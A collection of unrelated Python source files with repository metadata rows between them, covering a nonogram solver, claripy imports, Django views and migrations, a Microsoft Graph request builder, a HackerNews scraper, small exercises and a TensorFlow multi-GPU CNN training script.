#populate column counts
col_counts = []
for x in xrange(counts_width, width):
counts = []
for y in xrange(counts_height):
count = grid[y][x]
if count:
counts.append(count)
col_counts.append(counts)
#redo grid
width = inner_width
height = inner_height
inner_grid = []
for y in xrange(height):
inner_grid.append([])
for x in xrange(width):
inner_grid[y].append(grid[y+counts_height][x+counts_width])
grid = solve(row_counts, col_counts, inner_grid)
complete = True
for row in grid:
for item in row:
if item == None:
complete = False
if complete:
l = check_solution(grid)
if data_diff(l[0], row_counts) or data_diff(l[1], col_counts):
print 'FAIL!'
exit()
for y in xrange(counts_height):
for x in xrange(counts_width):
sys.stdout.write("\t")
for counts in col_counts:
try:
sys.stdout.write(str(counts[-counts_height+y]))
except:
pass
sys.stdout.write("\t")
print
y = 0
for row in grid:
for x in xrange(counts_width):
try:
sys.stdout.write(str(row_counts[y][-counts_width+x]))
except:
pass
sys.stdout.write("\t")
for square in row:
if square == True:
sys.stdout.write('T')
elif square == False:
sys.stdout.write('F')
sys.stdout.write("\t")
print
y += 1
if __name__ == "__main__":
if len(sys.argv) > 1:
solve_from_file(sys.argv[1])
else:
import doctest
doctest.testmod() | [
"repalviglator@yahoo.com"
] | repalviglator@yahoo.com |
0da90c73bc71313602b59d4b1cce999930cd4017 | 637669abf38aa06d786458bcb552d0d5dc188302 | /claripy/ast/__init__.py | 2da826a5b43d467502f3d34eadb856d283ede3f4 | [
"BSD-2-Clause"
] | permissive | angr/claripy | c5603b52f829a9b29630ed6665ab7ec294cb8157 | b35449fecd129dc46a0cabdd6499354e89b38a68 | refs/heads/master | 2023-09-05T18:48:19.736126 | 2023-09-05T17:17:45 | 2023-09-05T17:17:45 | 40,328,505 | 260 | 115 | BSD-2-Clause | 2023-09-11T22:09:06 | 2015-08-06T21:50:19 | Python | UTF-8 | Python | false | false | 1,376 | py | # pylint:disable=redefined-outer-name
from typing import TYPE_CHECKING
# Mypy is severely confused by this delayed import trickery, but works if we just pretend that the import
# happens here already
if TYPE_CHECKING:
from .bits import Bits
from .bv import BV
from .vs import VS
from .fp import FP
from .bool import Bool, true, false
from .int import Int
from .base import Base
from .strings import String
from .. import ops as all_operations
else:
Bits = lambda *args, **kwargs: None
BV = lambda *args, **kwargs: None
VS = lambda *args, **kwargs: None
FP = lambda *args, **kwargs: None
Bool = lambda *args, **kwargs: None
Int = lambda *args, **kwargs: None
Base = lambda *args, **kwargs: None
true = lambda *args, **kwargs: None
false = lambda *args, **kwargs: None
String = lambda *args, **kwargs: None
all_operations = None
def _import():
global Bits, BV, VS, FP, Bool, Int, Base, String, true, false, all_operations
from .bits import Bits
from .bv import BV
from .vs import VS
from .fp import FP
from .bool import Bool, true, false
from .int import Int
from .base import Base
from .strings import String
from .. import ops as all_operations
__all__ = ("Bits", "BV", "VS", "FP", "Bool", "true", "false", "Int", "Base", "String", "all_operations")
| [
"noreply@github.com"
] | angr.noreply@github.com |
ddbeff68f2104fbd657620867d9acc172c5adecb | 3af6960c805e9903eb27c09d8bc7ebc77f5928fe | /problems/0190_Reverse_Bits/__init__.py | 13d13496fce71652ff8239e68ab130a72e9cc66e | [] | no_license | romain-li/leetcode | b3c8d9d4473eebd039af16ad2d4d99abc2768bdd | 5e82b69bd041c2c168d75cb9179a8cbd7bf0173e | refs/heads/master | 2020-06-04T20:05:03.592558 | 2015-06-08T18:05:03 | 2015-06-08T18:05:03 | 27,431,664 | 2 | 1 | null | 2015-06-08T18:05:04 | 2014-12-02T12:31:58 | Python | UTF-8 | Python | false | false | 656 | py | ID = '190'
TITLE = 'Reverse Bits'
DIFFICULTY = 'Easy'
URL = 'https://oj.leetcode.com/problems/reverse-bits/'
BOOK = False
PROBLEM = r"""Reverse bits of a given 32 bits unsigned integer.
For example, given input 43261596 (represented in binary as
**00000010100101000001111010011100**), return 964176192 (represented in binary
as **00111001011110000010100101000000**).
**Follow up**:
If this function is called many times, how would you optimize it?
Related problem: [Reverse Integer](/problems/reverse-integer/)
**Credits:**
Special thanks to [@ts](https://oj.leetcode.com/discuss/user/ts) for adding
this problem and creating all test cases.
"""
| [
"romain_li@163.com"
] | romain_li@163.com |
d3b5e095fa1dab8e9c98895fa11a48312d856b56 | 874f46f4510b321ec3110ac8d5d5e572175c5544 | /Generator_Tests/TestFrec/scripts/generator.py | 94df7463f40e16990b3f6614572ff87accc2eb5a | [] | no_license | JordiEspinozaMendoza/Simulacion | bb271aee0908693ff0e36470dae98216096d9066 | fac1cdf5010a34a853a8b13d93209bcbde616e64 | refs/heads/main | 2023-05-31T14:06:21.329271 | 2021-06-14T02:52:06 | 2021-06-14T02:52:06 | 367,148,203 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,014 | py | import sys
import os
import pandas as pd
sys.setrecursionlimit(5000)
# X = Semilla
# a = Multiplicador
# c = Constante aditiva
# m = Modulo
def Operacion(X, a, c, m):
Resi = ((a*X)+c) % m
return Resi
def createDataFrame(data):
df = pd.DataFrame(data, columns=["n","Xn","Xn+1","Rn"])
cols = list(df.columns)
return df.to_string(), df, cols
def Recursivo(self, X0, a, c, m, conta,Detener, ArraySemilla, data):
try:
for Semilla in ArraySemilla:
if X0==Semilla:
Detener = True
if Detener==True or conta==325:
pass
else:
data["n"].append(conta+1)
data["Xn"].append(X0)
data["Xn+1"].append(Operacion(X0,a,c,m))
data["Rn"].append(Operacion(X0,a,c,m)/m)
conta = conta + 1
ArraySemilla.append(X0)
Recursivo(Operacion(X0,a,c,m),a,c,m,conta,Detener, ArraySemilla, data)
except Exception as e:
print(str(e))
| [
"jordi8101@gmail.com"
] | jordi8101@gmail.com |
7e595d3e782adea8924f7a1dd1432bd467b968e7 | 6ede75099fc38a682e030d70051389ea182d6cc2 | /ともき本番/incomeexpensesapi/menu/migrations/0028_foodstuff_myrecipe_usereat.py | b1c52866aa49cd76e4c04d5b33843c23ec472259 | [] | no_license | hangtran93tk/team06 | 0d86e59be866d7f6bda1b6c81f725ca1f80eba0f | 89000be20c18d3b9610c240b25c7c1944fc68d6d | refs/heads/master | 2023-03-12T11:58:03.802711 | 2021-02-26T03:51:36 | 2021-02-26T03:51:36 | 279,473,813 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,149 | py | # Generated by Django 3.0.5 on 2020-12-20 06:56
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('menu', '0027_menuinfo'),
]
operations = [
migrations.CreateModel(
name='Foodstuff',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255, null=True)),
('one_point_gram', models.FloatField()),
('one_point', models.FloatField()),
('two_point', models.FloatField()),
('three_point', models.FloatField()),
('four_point', models.FloatField()),
],
),
migrations.CreateModel(
name='UserEat',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('eatTime', models.IntegerField(choices=[(1, '朝食'), (2, '昼食'), (3, '夕食'), (4, '間食')])),
('date', models.DateField(auto_now_add=True)),
('menu', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='eatmenu', to='menu.MenuInfo')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='eatuser', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='MyRecipe',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('gram', models.FloatField()),
('foodstuff', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='recipestuff', to='menu.Foodstuff')),
('menu', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='recipemenu', to='menu.MenuInfo')),
],
),
]
| [
"18jz0129@jec.ac.jp"
] | 18jz0129@jec.ac.jp |
593c5efa70cba81b2a1c8e74a4bd3a4e8bf6c73c | 1bf512659c750eba27896ad5d1a5ad61fe08c0e4 | /musicrest/apps/api/models.py | 79348bd25ffd3e745eb1e479628b244e86f1bfc0 | [] | no_license | jeremyhilado/python-django-mini-project | fc80976e8576aa1eab9269521131107936bf8502 | 492e301e80266f1a44ba8ba3e5649af4992c836e | refs/heads/master | 2023-08-17T19:43:03.052514 | 2020-06-06T18:13:33 | 2020-06-06T18:13:33 | 261,493,243 | 0 | 0 | null | 2021-09-22T18:58:26 | 2020-05-05T14:22:20 | Python | UTF-8 | Python | false | false | 535 | py | from django.db import models
from apps.authentication.models import User
# Create your models here.
class Artist(models.Model):
name = models.CharField(max_length=255)
genre = models.CharField(max_length=255)
biography = models.TextField(blank=True)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
owner = models.ForeignKey(User, on_delete=models.CASCADE)
is_public = models.BooleanField(default=True)
def __str__(self):
return self.name
| [
"jhilado89@gmail.com"
] | jhilado89@gmail.com |
af9bf83cfaf55cd781211bfc9927638d904f30f8 | 975b2d421d3661e6770b601929d5f11d981d8985 | /msgraph/generated/sites/item/term_stores/item/groups/item/sets/item/children/item/children/item/relations/item/set/set_request_builder.py | 8ad5043efe01acfd37aa331d26266f34c018c4b3 | [
"MIT"
] | permissive | microsoftgraph/msgraph-sdk-python | a7c551b85daadeebf76ec4ae12668664ea639b42 | 27de7ccbe688d7614b2f6bde0fdbcda4bc5cc949 | refs/heads/main | 2023-09-03T21:45:27.989672 | 2023-08-31T06:22:18 | 2023-08-31T06:22:18 | 534,665,999 | 135 | 18 | MIT | 2023-09-14T11:04:11 | 2022-09-09T14:00:17 | Python | UTF-8 | Python | false | false | 4,960 | py | from __future__ import annotations
from dataclasses import dataclass, field
from kiota_abstractions.base_request_builder import BaseRequestBuilder
from kiota_abstractions.get_path_parameters import get_path_parameters
from kiota_abstractions.method import Method
from kiota_abstractions.request_adapter import RequestAdapter
from kiota_abstractions.request_information import RequestInformation
from kiota_abstractions.request_option import RequestOption
from kiota_abstractions.serialization import Parsable, ParsableFactory
from typing import Any, Callable, Dict, List, Optional, TYPE_CHECKING, Union
if TYPE_CHECKING:
from ................models.o_data_errors.o_data_error import ODataError
from ................models.term_store.set import Set
class SetRequestBuilder(BaseRequestBuilder):
"""
Provides operations to manage the set property of the microsoft.graph.termStore.relation entity.
"""
def __init__(self,request_adapter: RequestAdapter, path_parameters: Optional[Union[Dict[str, Any], str]] = None) -> None:
"""
Instantiates a new SetRequestBuilder and sets the default values.
Args:
path_parameters: The raw url or the Url template parameters for the request.
request_adapter: The request adapter to use to execute the requests.
"""
super().__init__(request_adapter, "{+baseurl}/sites/{site%2Did}/termStores/{store%2Did}/groups/{group%2Did}/sets/{set%2Did}/children/{term%2Did}/children/{term%2Did1}/relations/{relation%2Did}/set{?%24select,%24expand}", path_parameters)
async def get(self,request_configuration: Optional[SetRequestBuilderGetRequestConfiguration] = None) -> Optional[Set]:
"""
The [set] in which the relation is relevant.
Args:
request_configuration: Configuration for the request such as headers, query parameters, and middleware options.
Returns: Optional[Set]
"""
request_info = self.to_get_request_information(
request_configuration
)
from ................models.o_data_errors.o_data_error import ODataError
error_mapping: Dict[str, ParsableFactory] = {
"4XX": ODataError,
"5XX": ODataError,
}
if not self.request_adapter:
raise Exception("Http core is null")
from ................models.term_store.set import Set
return await self.request_adapter.send_async(request_info, Set, error_mapping)
def to_get_request_information(self,request_configuration: Optional[SetRequestBuilderGetRequestConfiguration] = None) -> RequestInformation:
"""
The [set] in which the relation is relevant.
Args:
request_configuration: Configuration for the request such as headers, query parameters, and middleware options.
Returns: RequestInformation
"""
request_info = RequestInformation()
request_info.url_template = self.url_template
request_info.path_parameters = self.path_parameters
request_info.http_method = Method.GET
request_info.headers["Accept"] = ["application/json"]
if request_configuration:
request_info.add_request_headers(request_configuration.headers)
request_info.set_query_string_parameters_from_raw_object(request_configuration.query_parameters)
request_info.add_request_options(request_configuration.options)
return request_info
@dataclass
class SetRequestBuilderGetQueryParameters():
"""
The [set] in which the relation is relevant.
"""
def get_query_parameter(self,original_name: Optional[str] = None) -> str:
"""
Maps the query parameters names to their encoded names for the URI template parsing.
Args:
original_name: The original query parameter name in the class.
Returns: str
"""
if not original_name:
raise TypeError("original_name cannot be null.")
if original_name == "expand":
return "%24expand"
if original_name == "select":
return "%24select"
return original_name
# Expand related entities
expand: Optional[List[str]] = None
# Select properties to be returned
select: Optional[List[str]] = None
from kiota_abstractions.base_request_configuration import BaseRequestConfiguration
@dataclass
class SetRequestBuilderGetRequestConfiguration(BaseRequestConfiguration):
from kiota_abstractions.base_request_configuration import BaseRequestConfiguration
"""
Configuration for the request such as headers, query parameters, and middleware options.
"""
# Request query parameters
query_parameters: Optional[SetRequestBuilder.SetRequestBuilderGetQueryParameters] = None
| [
"GraphTooling@service.microsoft.com"
] | GraphTooling@service.microsoft.com |
cb4ceece3e859d4af57c7b4bc35b7c12546e1c09 | b329784883875fea0d655f4371549c400ab876a7 | /news.py | 5cc3035a0d6bf571d225ffb8a12fb412c8575b22 | [] | no_license | veekaybee/markovhn | 9ce8b4159c483bbc0629bf9cc51d0eba591bd553 | 99f5eefc292fc511d1f89b1acbf1ba0199245b16 | refs/heads/master | 2021-01-23T18:50:48.906754 | 2015-08-24T11:46:41 | 2015-08-24T11:46:41 | 41,229,413 | 15 | 4 | null | null | null | null | UTF-8 | Python | false | false | 675 | py | import urllib2
import json
#HackerNews API documentation: https://github.com/HackerNews/API
api_url='https://hacker-news.firebaseio.com/v0/topstories.json'
item_url='https://hacker-news.firebaseio.com/v0/item/'
#Pull all story numbers into a Python data dictionary
response = urllib2.urlopen(api_url)
data=json.load(response)
#Takes each story number and extracts the title by treating as Python dictionary
with open("headlines.txt", "w") as output_file:
for i in data:
genurl="%s%s.json?print=pretty" % (item_url, i)
item_response=urllib2.urlopen(genurl)
parsed_response=json.load(item_response)
output_file.write(parsed_response["title"].encode('utf-8'))
| [
"vicki.boykis@gmail.com"
] | vicki.boykis@gmail.com |
11c23983d7ab4baebc227f5160e0120c3f42e04c | c0397a0617f2603dc5dbd0af44462e561a52ea18 | /views.py | 1b14f569ef0fd7a8ea1427db41bf9e8082f69ff5 | [] | no_license | PujariSrinivas/Django | c865dddfaef3e7221597cf9f5e911241300d2825 | e94333926daef4a478ffa83c0f6c997700427696 | refs/heads/master | 2023-06-05T19:14:55.633274 | 2021-06-25T04:50:41 | 2021-06-25T04:50:41 | 378,155,824 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,054 | py | from django.shortcuts import render
from django.http import HttpResponse
# Create your views here.
def home(request):
return HttpResponse("Hi Good Evening to All...")
def htmltag(y):
return HttpResponse("<h2>Hi Welcome to APSSDC</h2>")
def usernameprint(request,uname):
return HttpResponse("<h2>Hi Welcome <span style='color:green'>{}</span></h2>".format(uname))
def usernameage(request,un,ag):
return HttpResponse("<h3 style='text-align:center;background-color:green'>My name is <span style='color:yellow'>{}</span> and my age is: <span style='color:red'>{}</span></h3>".format(un,ag))
def empdetails(request,eid,ename,eage):
return HttpResponse("<script>alert('Hi Welcome {}')</script><h3>Hi Welcome {} and your age is {} and your id is {}</h3>".format(ename,ename,eage,eid))
def htm(request):
return render(request,'html/basics.html')
def ytname(request,name):
return render(request,'html/ytname.html',{'n':name})
def empname(request,id,name):
k = {'i':id,'n':name}
return render(request,'html/ehtml.html',k)
def studentdetails(request):
return render(request,'html/stud.html')
def internaljs(request):
return render(request,'html/internaljs.html')
def myform(request):
if request.method=="POST":
#print(request.POST)
uname = request.POST['uname']
rollno = request.POST['rollno']
email = request.POST['email']
print(uname,rollno,email)
data = {'username':uname,'rno':rollno,'emailid':email}
return render(request,'html/display.html',data)
return render(request,'html/form.html')
def bootstrap(request):
return render(request,'html/boot.html')
def Registration(request):
if request.method=="POST":
fname = request.POST['fname']
lname = request.POST['lname']
rollno = request.POST['rollno']
email = request.POST['email']
phoneno = request.POST['phoneno']
print(fname,lname,rollno,email,phoneno)
data = {'firstname':fname,'lastname':lname,'rno':rollno,'emailid':email,'pno':phoneno}
return render(request,'html/Registration.html')
| [
"noreply@github.com"
] | PujariSrinivas.noreply@github.com |
b9b22ed2ac4565940e04c8fac0f36e72bf88ef75 | eb61d62ca1f6f0123e3771105f5dfbbd6115138d | /.history/23-08-21_20210912011408.py | d242edf35564cc66ff35c5dd66a540fa6f9fc0b8 | [] | no_license | Alopezm5/CORRECTO-2 | e0f14bcc3a88c0e222d10e3261e68532008bc42e | 223613f1fb04dce3fac9f82f243cb2f22fe100f3 | refs/heads/main | 2023-07-29T06:52:48.147424 | 2021-09-12T20:33:27 | 2021-09-12T20:33:27 | 388,995,308 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,944 | py | class Empresa:
def __init__(self,nom="El mas barato",ruc="0999999999",tel="042971234",dir="Juan Montalvo"):
self.nombre=nom
self.ruc=ruc
self.telefono=tel
self.direccion=dir
def mostrarEmpresa(self):
print("Empresa: {:17}, RUC: {}".format(self.nombre,self.ruc))
class Cliente:
def __init__(self,nom,ced,tel):
self.nombre=nom
self.cedula=ced
self.telefono=tel
def mostrarCliente(self):
print(self.nombre,self.cedula,self.telefono)
class ClienteCorporativo(Cliente):
def __init__(self,nomb,cedu,telecontrato):
super().__init__(nomb,cedu,tele,contrato)
self.__contrato=contrato
@property
def contrato(self): #getter: obtener el valor del atributo privado
return self.__contrato
@contrato.setter
def contrato(self,value): #setter: asigna el valor del atributo privado
if value:
self.__contrato=value
else:
self.__contrato="Sin contrato"
def mostrarCliente(self):
print(self.nombre, self.__contrato)
class ClientePersonal(Cliente):
def __init__(self,nom,ced,tel,promocion=True):
super().__init__(nom,ced,tel,)
self.__promocion=promocion
@property
def promocion(self): #getter: obtener el valor del atributo privado
return self.__promocion
def mostrarCliente(self):
print(self.nombre, self.__promocion)
class Articulo:
secuencia=0
iva=0.12
def __init__(self,des,pre,sto):
Articulo.secuencia+=1
self.codigo=Articulo.secuencia
self.descripcion= des
self.precio=pre
self.stock=sto
def mostraArticulo(self):
print(self.codigo,self.nombre)
class DetVenta:
linea=0
def __init__(self,articulo,cantidad):
DetVenta.linea+=1
self.lineaDetalle=DetVenta.linea
self.articulo=articulo
self.precio=articulo.precio
self.cantidad=cantidad
class CabVenta:
def __init__(self,fac,empresa,fecha,cliente,tot=0):
self.empresa=empresa
self.factura=fac
self.fecha=fecha
self.cliente=cliente
self.total=tot
self.detalleVen=[]
def agregarDetalle(self,articulo,cantidad):
detalle=DetVenta(articulo,cantidad)
self.total+=detalle.precio*detalle.cantidad
self.detalleVen.append(detalle)
def mostrarVenta(self,empNombre,empRuc):
print("Empresa {:17} r")
# emp=Empresa("El mas barato","0953156049","0998132446","Coop. Juan Montalvo")
# emp.mostrarEmpresa()
# print(emp.nombre)
cli1=ClientePersonal("Jose","0912231499","042567890",True)
cli1.mostrarCliente
art1=Articulo("Aceite",2,100)
art1.mostraArticulo()
art2=Articulo("Coca Cola",1,200)
art2.mostraArticulo()
art3=Articulo("Leche",1.5,200)
art3.mostraArticulo()
print(Articulo.iva()) | [
"85761855+Alopezm5@users.noreply.github.com"
] | 85761855+Alopezm5@users.noreply.github.com |
4770757cc653f027b500d6f75168f8318a702d86 | 7f2612e5132e1583e5ba9758f299a8f301f0dc70 | /FB/5-longest-palindromic-substring.py | fb44ee0f8a6db9b0e87b7abf9cf4a48bd884a73a | [] | no_license | taeheechoi/coding-practice | 380e263a26ed4de9e542c51e3baa54315127ae4f | 9528b5e85b0ea2960c994ffea62b5be86481dc38 | refs/heads/main | 2022-07-09T11:22:18.619712 | 2022-06-28T14:55:51 | 2022-06-28T14:55:51 | 447,082,854 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 426 | py | class Solution:
# Time O(N^2) Space O(1)
def longestPalindrome(self, s):
res = ''
for i in range(len(s)):
odd = self.is_pal(s, i, i)
even = self.is_pal(s, i, i+1)
res = max(odd, even, res, key=len)
return res
def is_pal(self, s, l, r):
while l >= 0 and r < len(s) and s[l] == s[r]:
l -= 1
r += 1
return s[l+1: r] | [
"dadac76@hotmail.com"
] | dadac76@hotmail.com |
e2450988f82302bcbaff58abb9d993b553804b16 | 0adbbf6092f5444b623ccbf3b81206d027c96b68 | /23.py | ed2e63159145735c587c65da81d422e54ba334cf | [] | no_license | c1c51/python-crap | bc3fe076e42aa0f5843879b7af56314b09e5f931 | f16782fca27ac616e043b5e1c71da8fddef0f848 | refs/heads/master | 2021-05-10T09:55:38.465484 | 2018-01-25T17:19:57 | 2018-01-25T17:19:57 | 118,942,213 | 0 | 0 | null | 2018-01-25T17:20:37 | 2018-01-25T17:02:40 | Python | UTF-8 | Python | false | false | 125 | py | w=int(input("width?"))
l=int(input("length?"))
r=int(input("radius?"))
print((w*l)-((r*r)*3.14159265358979323846264338))
| [
"noreply@github.com"
] | c1c51.noreply@github.com |
862a41c8dfac8339006c6b0313a9a71788c0ef52 | 1fcb40f1f2a2c6b4f5ab6c612b900c7eb9517502 | /tf-tutorials/multigpu/multi_gpu_cnn.py | 1954bcca56e4a3d6e52d3c5b5927bba9e28deb39 | [] | no_license | prativa/ai-artist | 3466b7b160180d207c94429fbec2bd33b0da53c8 | ee98af787233889ed92cc84ce66104e3f7f6e84a | refs/heads/master | 2020-04-15T19:11:45.467297 | 2018-11-29T20:22:48 | 2018-11-29T20:22:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,137 | py | import tensorflow as tf
import os
import numpy as np
import math
from classification.skin import data_loader
import time
import random
from sklearn import metrics
_IMAGE_SIZE = 224
_IMAGE_CHANNELS = 3
_NUM_CLASSES = 2
_BATCH_SIZE = 50 # this batch size will be for each gpu, if multi gpu setup used it will consume batch_size * gpu nums in every iteration.
_EPOCHS = 1000
learning_rate = 0.0001
gpu_nums=2
_BATCH_SIZE_VALID = 75
_SAVE_PATH = "./tensorboard/isic-classification-task1/"
def core_model(input_img, y, num_classes):
x_image = tf.reshape(input_img, [-1, _IMAGE_SIZE, _IMAGE_SIZE, _IMAGE_CHANNELS], name='images')
def variable_with_weight_decay(name, shape, stddev, wd):
dtype = tf.float32
var = variable_on_cpu(name, shape, tf.truncated_normal_initializer(stddev=stddev, dtype=dtype))
if wd is not None:
weight_decay = tf.multiply(tf.nn.l2_loss(var), wd, name='weight_loss')
tf.add_to_collection('losses', weight_decay)
return var
def variable_on_cpu(name, shape, initializer):
with tf.device('/cpu:0'):
dtype = tf.float32
var = tf.get_variable(name, shape, initializer=initializer, dtype=dtype)
return var
with tf.variable_scope('conv1') as scope:
kernel = variable_with_weight_decay('weights', shape=[5, 5, 3, 64], stddev=5e-2, wd=0.0)
conv = tf.nn.conv2d(x_image, kernel, [1, 1, 1, 1], padding='SAME')
biases = variable_on_cpu('biases', [64], tf.constant_initializer(0.0))
pre_activation = tf.nn.bias_add(conv, biases)
conv1 = tf.nn.relu(pre_activation, name=scope.name)
tf.summary.histogram('Convolution_layers/conv1', conv1)
tf.summary.scalar('Convolution_layers/conv1', tf.nn.zero_fraction(conv1))
norm1 = tf.nn.lrn(conv1, 4, bias=1.0, alpha=0.001 / 9.0, beta=0.75, name='norm1')
pool1 = tf.nn.max_pool(norm1, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME', name='pool1')
with tf.variable_scope('conv2') as scope:
kernel = variable_with_weight_decay('weights', shape=[5, 5, 64, 64], stddev=5e-2, wd=0.0)
conv = tf.nn.conv2d(pool1, kernel, [1, 1, 1, 1], padding='SAME')
biases = variable_on_cpu('biases', [64], tf.constant_initializer(0.1))
pre_activation = tf.nn.bias_add(conv, biases)
conv2 = tf.nn.relu(pre_activation, name=scope.name)
tf.summary.histogram('Convolution_layers/conv2', conv2)
tf.summary.scalar('Convolution_layers/conv2', tf.nn.zero_fraction(conv2))
norm2 = tf.nn.lrn(conv2, 4, bias=1.0, alpha=0.001 / 9.0, beta=0.75, name='norm2')
pool2 = tf.nn.max_pool(norm2, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME', name='pool2')
with tf.variable_scope('conv3') as scope:
kernel = variable_with_weight_decay('weights', shape=[3, 3, 64, 128], stddev=5e-2, wd=0.0)
conv = tf.nn.conv2d(pool2, kernel, [1, 1, 1, 1], padding='SAME')
biases = variable_on_cpu('biases', [128], tf.constant_initializer(0.0))
pre_activation = tf.nn.bias_add(conv, biases)
conv3 = tf.nn.relu(pre_activation, name=scope.name)
tf.summary.histogram('Convolution_layers/conv3', conv3)
tf.summary.scalar('Convolution_layers/conv3', tf.nn.zero_fraction(conv3))
with tf.variable_scope('conv4') as scope:
kernel = variable_with_weight_decay('weights', shape=[3, 3, 128, 128], stddev=5e-2, wd=0.0)
conv = tf.nn.conv2d(conv3, kernel, [1, 1, 1, 1], padding='SAME')
biases = variable_on_cpu('biases', [128], tf.constant_initializer(0.0))
pre_activation = tf.nn.bias_add(conv, biases)
conv4 = tf.nn.relu(pre_activation, name=scope.name)
tf.summary.histogram('Convolution_layers/conv4', conv4)
tf.summary.scalar('Convolution_layers/conv4', tf.nn.zero_fraction(conv4))
with tf.variable_scope('conv5') as scope:
kernel = variable_with_weight_decay('weights', shape=[3, 3, 128, 128], stddev=5e-2, wd=0.0)
conv = tf.nn.conv2d(conv4, kernel, [1, 1, 1, 1], padding='SAME')
biases = variable_on_cpu('biases', [128], tf.constant_initializer(0.0))
pre_activation = tf.nn.bias_add(conv, biases)
conv5 = tf.nn.relu(pre_activation, name=scope.name)
tf.summary.histogram('Convolution_layers/conv5', conv5)
tf.summary.scalar('Convolution_layers/conv5', tf.nn.zero_fraction(conv5))
norm3 = tf.nn.lrn(conv5, 4, bias=1.0, alpha=0.001 / 9.0, beta=0.75, name='norm3')
pool3 = tf.nn.max_pool(norm3, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME', name='pool3')
with tf.variable_scope('fully_connected1') as scope:
reshape = tf.layers.flatten(pool3)
dim = reshape.get_shape()[1].value
weights = variable_with_weight_decay('weights', shape=[dim, 384], stddev=0.04, wd=0.004)
biases = variable_on_cpu('biases', [384], tf.constant_initializer(0.1))
local3 = tf.nn.relu(tf.matmul(reshape, weights) + biases, name=scope.name)
tf.summary.histogram('Fully connected layers/fc1', local3)
tf.summary.scalar('Fully connected layers/fc1', tf.nn.zero_fraction(local3))
with tf.variable_scope('fully_connected2') as scope:
weights = variable_with_weight_decay('weights', shape=[384, 192], stddev=0.04, wd=0.004)
biases = variable_on_cpu('biases', [192], tf.constant_initializer(0.1))
local4 = tf.nn.relu(tf.matmul(local3, weights) + biases, name=scope.name)
tf.summary.histogram('Fully connected layers/fc2', local4)
tf.summary.scalar('Fully connected layers/fc2', tf.nn.zero_fraction(local4))
with tf.variable_scope('output') as scope:
weights = variable_with_weight_decay('weights', [192, _NUM_CLASSES], stddev=1 / 192.0, wd=0.0)
biases = variable_on_cpu('biases', [_NUM_CLASSES], tf.constant_initializer(0.0))
softmax_linear = tf.add(tf.matmul(local4, weights), biases, name=scope.name)
tf.summary.histogram('Fully connected layers/output', softmax_linear)
y_pred_cls = tf.argmax(softmax_linear, axis=1)
return softmax_linear, y_pred_cls
def variable_with_weight_decay(name, shape, stddev, wd):
dtype = tf.float32
var = variable_on_cpu( name, shape, tf.truncated_normal_initializer(stddev=stddev, dtype=dtype))
if wd is not None:
weight_decay = tf.multiply(tf.nn.l2_loss(var), wd, name='weight_loss')
tf.add_to_collection('losses', weight_decay)
return var
def variable_on_cpu(name, shape, initializer):
with tf.device('/cpu:0'):
dtype = tf.float32
var = tf.get_variable(name, shape, initializer=initializer, dtype=dtype)
return var
def average_gradients(tower_grads):
average_grads = []
for grad_and_vars in zip(*tower_grads):
# Note that each grad_and_vars looks like the following:
# ((grad0_gpu0, var0_gpu0), ... , (grad0_gpuN, var0_gpuN))
grads = []
for g, _ in grad_and_vars:
# Add 0 dimension to the gradients to represent the tower.
expanded_g = tf.expand_dims(g, 0)
# Append on a 'tower' dimension which we will average over below.
grads.append(expanded_g)
# Average over the 'tower' dimension.
grad = tf.concat(axis=0, values=grads)
grad = tf.reduce_mean(grad, 0)
# Keep in mind that the Variables are redundant because they are shared
# across towers. So .. we will just return the first tower's pointer to
# the Variable.
v = grad_and_vars[0][1]
grad_and_var = (grad, v)
average_grads.append(grad_and_var)
return average_grads
def predict_valid(show_confusion_matrix=False):
'''
Make prediction for all images in test_x
'''
images_valid = tf.placeholder(tf.float32, shape=[None , 224*224*3])
labels_valid = tf.placeholder(tf.float32, shape=[None , 2])
valid_x, valid_y, valid_l = loader.getValidationDataForClassificationMelanoma()
valid_count = len(valid_x)
shuffle_order = [i for i in range(valid_count)]
random.shuffle(shuffle_order)
# print(shuffle_order)
print("iterations {}".format(num_iterations))
valid_x = valid_x[shuffle_order].reshape(valid_count, -1)
valid_y = valid_y[shuffle_order].reshape(valid_count, -1)
i = 0
y_pred = np.zeros(shape=len(valid_x), dtype=np.int)
output, y_pred_class = core_model(images_valid, labels_valid, _NUM_CLASSES)
while i < len(valid_x):
j = min(i + _BATCH_SIZE, len(valid_x))
batch_xs = valid_x[i:j, :]
batch_ys = valid_y[i:j, :]
y_pred[i:j] = sess.run(y_pred_class, feed_dict={images_valid: batch_xs, labels_valid: batch_ys})
i = j
correct = (np.argmax(valid_y, axis=1) == y_pred)
acc = correct.mean() * 100
correct_numbers = correct.sum()
print("Accuracy on Valid-Set: {0:.2f}% ({1} / {2})".format(acc, correct_numbers, len(valid_x)))
y_true = np.argmax(valid_y, axis=1)
cm = metrics.confusion_matrix(y_true=y_true, y_pred=y_pred)
for i in range(_NUM_CLASSES):
class_name = "({}) {}".format(i, valid_l[i])
print(cm[i, :], class_name)
class_numbers = [" ({0})".format(i) for i in range(_NUM_CLASSES)]
print("".join(class_numbers))
auc = metrics.roc_auc_score(y_true, y_pred)
